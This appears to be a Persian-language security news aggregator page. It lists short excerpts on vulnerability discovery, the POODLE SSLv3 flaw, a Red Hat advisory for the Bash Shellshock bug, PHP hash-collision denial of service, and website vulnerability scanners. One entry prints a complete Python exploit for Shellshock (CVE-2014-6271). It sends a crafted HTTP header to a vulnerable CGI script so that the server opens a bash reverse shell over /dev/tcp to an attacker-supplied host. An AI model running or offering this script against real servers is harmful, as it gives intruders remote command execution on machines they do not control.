منبع اصلی نوشتار زیر در این لینک قرار دارد

Vulnerability Identification

        تهیه و تنظیم : آریا صادقی ایمیل : [email protected] آی دی تلگرام : @aryasadeghy   مقدمه: یکی از خسته کننده ترین قسمت در هکینگ و یا امنیت ، پی بردن و کشف کردن باگ بر روی نقطه ای خاص است. ولی این بخش برای دوستانی که در “هک قانونمند” مشغول به… ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

توضیح فنی آسیب پذیری پودل

آسیب پذیری POODLE که امروز منتشر شده است، از یک ضعف در مبنای تئوری SSLv3 استفاده کرده است، نه یک مشکل پیاده سازی. به همین دلیل تنها راه برطرف کردن آن غیر فعال کردن کامل این پروتوکل می‌باشد.

اصل مبنای تئوری این آسیب پذیری توسط Serge Vaudenay در سال ۲۰۰۱ مطرح شده بود، اما او فکر می‌کرده است که امکان استفاده عملی از این آسیب پذیری وجود ندارد. هم اکنون یک روند عملی برای استفاده از این آسیب پذیری مطرح شده است. این روند عملی، اگر چه پیچیده، ولی قطعی است (احتمالی نیست) و فراهم کردن همه‌ی شرایط آن اگر چه نیاز به تلاش بسیاری دارد (و نوشتن یک اسکریپت برای آن شاید سخت باشد) ولی کاملا شدنی است.

ادامه مطلب
ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

معرفی باگ جدید در SSL : پودل

SSL چیست؟

SSL یک پروتکل رمزنگاری است که برای برقراری یک ارتباطات امن
بین یک سرویس دهنده و یک سرویس گیرنده طراحی شده است. در اینترنت بسیاری از
وب سایت‌ها از این پروتکل و البته جایگزین آن یعنی پروتکل TLS برای دریافت
داده‌های حساس کاربر مانند، کلمه عبور، اطلاعات بانکی کاربر استفاده
می‌کنند. استفاده از این پروتکل‌ها تضمین دهنده‌ی این است که یک نفوذگر
نباید بتواند اطلاعات رمز شده را در طول مسیر رمز‌گشایی (تغییر و …) کند.
SSL یک پروتکل قدیمی می‌باشد نسخه‌ی سوم آن مربوط به ۱۵ سال پیش می‌باشد
اما همچنان در مرورگرها از آن پشتیبانی می‌شود. بیشتر وب‌سایت ها از
نسخه‌های TLS استفاده می‌کنند اما در صورت عدم پشتیبانی مرورگر کاربر از
TLS سعی می‌کنند از نسخه‌های قدیمی‌تر، مانند SSLv3 برای برقراری ارتباط
استفاده کنند.
ادامه مطلب
ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

Bash vulnerability – Python reverse shell

    #
    #CVE-2014-6271 cgi-bin reverse shell
    #
     
    import httplib,urllib,sys
     
    if (len(sys.argv)<4):
            print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]
            print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0]
            exit(0)
     
    conn = httplib.HTTPConnection(sys.argv[1])
    reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3]
     
    headers = {“Content-type”: “application/x-www-form-urlencoded”,
            “test”:reverse_shell }
    conn.request(“GET”,sys.argv[2],headers=headers)
    res = conn.getresponse()
    print res.status, res.reason
    data = res.read()
    print data

ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

منبع اصلی نوشتار زیر در این لینک قرار دارد

باگ امنیتی جدید در Bash سرور های لینوکسی (CVE-2014-6271)

به نام خدا دیروز از طرف redhat یک اعلامیه منتشر شد که در Bash های ورژن زیر مشکل امنیتی است . در قسمت Fixed Package نسخه هایی را می بینید که هیچ مشکل امنیتی ندارند اما به هر حال دوستان با کد و روش داده شده حتما تست کنند.   Product/Channel Fixed in package Remediation details Red Hat Enterprise Linux 7 bash-4.2.45-5.el7_0.2 Red Hat Enterprise Linux Red Hat Enterprise Linux 6 bash-4.1.2-15.el6_5.1 Red Hat Enterprise […] ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

آسیب‌پذیری PHP ممکن است میلیون‌ها سرور را از کار بندازد

آرایه‌ها در PHP و سایر زبان‌های اسکریپتی بسیار پرکاربرد و محبوب هستند. با استفاده از آرایه‌ها می‌تونید هر تعداد و از هرنوعی داده ذخیره کنید. و حتی بعد از تشکیل آرایه هر تعداد موجودیت که خواستید به آرایه اضافه کنید. مشکل اصلی PHP هم که بش میگن تصادم هش (Hash Colision) از همین‌جا میاد. شرح مشکل در PHP آرایه‌های زیادی به طور پیشفرض از محیط و یا از کاربر انتهایی … ادامه مطلب

منبع اصلی نوشتار زیر در این لینک قرار دارد

۶ ابزار پایشگر نقاط آسیب‌پذیر وب سایت‌ها

امنیت وب‌سایت‌ها به دلیل اطلاعات حساسی که از کاربران و شرکت‌ها در آنها نگهداری میشود بسیار مهم است. امروزه deface شدن وب‌سایت‌ها خیلی رایج است و حتی بچه کوچولوهای اسکریپ‌باز و هکرهای تازه به دوران رسیده هم اینکار رو به راحتی انجام می‌دهند. رایج‌ترین آسیب‌پذیری‌ها مثل SQL-Injection و cross site scripting منتهی به deface شدن می‌شوند. بنابراین اگر می‌خواهید قبل از اینکه یک هکر سایت شما رو مورد عنایت قرار…. ادامه مطلب